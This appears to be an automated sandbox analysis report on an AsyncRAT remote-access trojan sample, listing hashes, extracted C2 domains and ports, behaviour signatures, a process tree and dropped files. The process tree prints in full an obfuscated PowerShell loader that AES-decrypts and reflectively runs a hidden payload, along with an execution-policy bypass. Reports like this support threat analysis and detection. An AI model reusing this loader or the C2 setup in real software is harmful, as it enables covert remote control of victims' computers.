Analysis

  • max time kernel: 36s
  • max time network: 35s
  • platform: windows7_x64
  • resource: win7-20221111-en
  • resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
  • submitted: 01-02-2023 20:06

General

  • Target: 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
  • Size: 72KB
  • MD5: 8cb1d168cf75e754026203935dcfa023
  • SHA1: ba18d6636f1c59a72fa8042cff7c1e8fdf69eecb
  • SHA256: 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126
  • SHA512: 7254e3bc08701fb233d1b0c340fd6104b9fc4d36ab962f7ac541f0aee539fe3c9a7b3fa692968a977e68690ad183e77d2b5f962b1265983b4771773ff55c62ae
  • SSDEEP: 1536:/rGBmYaZyxKeBy3bCXS4ZeUSlACnztfx:/rGBmYaZyxZBy3bCHelAI9x

Score
10/10

Malware Config

Extracted

  • Family: asyncrat
  • Version: 0.5.7B
  • Botnet: Default
  • C2:
    churchmon.ddns.net:6606
    churchmon.ddns.net:7707
    churchmon.ddns.net:8808
    churchmon21.ddns.net:6606
    churchmon21.ddns.net:7707
    churchmon21.ddns.net:8808
    churchmon22.ddns.net:6606
    churchmon22.ddns.net:7707
    churchmon22.ddns.net:8808
  • Mutex: AsyncMutex_6SI8OkPnk
  • Attributes
    • delay: 3
    • install: false
    • install_folder: %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
    "C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1184
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\gefcmy.bat"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\gefcmy.bat"'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1456
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\gefcmy.bat" "
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1100
          • C:\Users\Admin\AppData\Local\Temp\gefcmy.bat.exe
            "gefcmy.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $DlAMm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\gefcmy.bat').Split([Environment]::NewLine);foreach ($gnxLA in $DlAMm) { if ($gnxLA.StartsWith(':: ')) { $EieGe = $gnxLA.Substring(3); break; }; };$CtMSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($EieGe);$CdbBY = New-Object System.Security.Cryptography.AesManaged;$CdbBY.Mode = [System.Security.Cryptography.CipherMode]::CBC;$CdbBY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$CdbBY.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NEPcZ0sSGxev/0ytodeTKgGxdiSyFK6PvVJKMsPopm0=');$CdbBY.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x/ZAOJI37zOKAo+7A/xutg==');$bwBZg = $CdbBY.CreateDecryptor();$CtMSE = $bwBZg.TransformFinalBlock($CtMSE, 0, $CtMSE.Length);$bwBZg.Dispose();$CdbBY.Dispose();$OapWv = New-Object System.IO.MemoryStream(, $CtMSE);$Otndw = New-Object System.IO.MemoryStream;$HxJaj = New-Object System.IO.Compression.GZipStream($OapWv, [IO.Compression.CompressionMode]::Decompress);$HxJaj.CopyTo($Otndw);$HxJaj.Dispose();$OapWv.Dispose();$Otndw.Dispose();$CtMSE = $Otndw.ToArray();$HiNYF = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($CtMSE);$wpmOJ = $HiNYF.EntryPoint;$wpmOJ.Invoke($null, (, [string[]] ('')))
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:736
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8838.tmp.bat""
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:532
      • C:\Windows\SysWOW64\timeout.exe
        timeout 2
        3⤵
        • Delays execution with timeout.exe
        PID:808

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Discovery: System Information Discovery, T1082 (1)

Downloads

  • C:\Users\Admin\AppData\Local\Temp\gefcmy.bat
    Filesize: 325KB
    MD5: 36438d908fc48e243fc04035eba3a6cd
    SHA1: a552a88e74440a1137b3a3a14e4089a630dfb855
    SHA256: 80504bf8dd15434a9841595f3f9e405f8843dd53b292d8e30d9a15b53b51fa7a
    SHA512: 3cea5f310c94129fe89c1cebfada52b4d0ac1d4f4e7be4ea06872b90e969b2bec4e322a127f6c4b02a9223ad6a29b21f90c1d627f233f938ded51da3ff6fd611

  • C:\Users\Admin\AppData\Local\Temp\gefcmy.bat.exe
    Filesize: 442KB
    MD5: 92f44e405db16ac55d97e3bfe3b132fa
    SHA1: 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
    SHA256: 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
    SHA512: f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

  • C:\Users\Admin\AppData\Local\Temp\tmp8838.tmp.bat
    Filesize: 216B
    MD5: b114271fc8c4f0f20cc0cf6b5315bec7
    SHA1: e83d81844f32e140a7de1f455fb3464551bfb27e
    SHA256: 7db48b1affca55499bcdecfc3597346246c7b1f04aa8e0b8ea23e2de541bf892
    SHA512: 9a3ab883bfd4be07c3bb19e89cbedd90ec7fe1820e7ded15d918397182ed18f9ee9c24a657f77bebe8f34d696a59391fe83c6d892f5e9e44a18d8bc5e0bcf8d9

  • \Users\Admin\AppData\Local\Temp\gefcmy.bat.exe
    Filesize: 442KB
    MD5: 92f44e405db16ac55d97e3bfe3b132fa
    SHA1: 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
    SHA256: 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
    SHA512: f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

  • memory/532-58-0x0000000000000000-mapping.dmp
  • memory/736-68-0x0000000000000000-mapping.dmp
  • memory/736-71-0x0000000074400000-0x00000000749AB000-memory.dmp (Filesize: 5.7MB)
  • memory/736-72-0x0000000074400000-0x00000000749AB000-memory.dmp (Filesize: 5.7MB)
  • memory/808-61-0x0000000000000000-mapping.dmp
  • memory/916-57-0x0000000000000000-mapping.dmp
  • memory/1100-65-0x0000000000000000-mapping.dmp
  • memory/1184-54-0x00000000010B0000-0x00000000010C2000-memory.dmp (Filesize: 72KB)
  • memory/1184-56-0x0000000000590000-0x00000000005B2000-memory.dmp (Filesize: 136KB)
  • memory/1184-55-0x0000000075BE1000-0x0000000075BE3000-memory.dmp (Filesize: 8KB)
  • memory/1456-59-0x0000000000000000-mapping.dmp
  • memory/1456-63-0x0000000073F30000-0x00000000744DB000-memory.dmp (Filesize: 5.7MB)
  • memory/1456-66-0x0000000073F30000-0x00000000744DB000-memory.dmp (Filesize: 5.7MB)